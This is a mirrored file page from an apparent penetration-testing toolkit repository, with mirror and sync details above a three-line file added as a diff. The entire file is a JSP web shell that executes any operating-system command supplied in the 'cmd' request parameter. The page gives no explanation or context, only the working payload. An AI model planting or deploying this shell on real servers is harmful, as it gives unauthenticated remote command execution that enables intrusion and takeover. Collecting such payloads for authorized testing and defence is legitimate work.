mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-11-27 14:40:26 -05:00
3 lines
66 B
Text
Executable file
3 lines
66 B
Text
Executable file
+<%
|
|
+Runtime.getruntime().exec(request.getParameter("cmd"))
|
|
+%>
|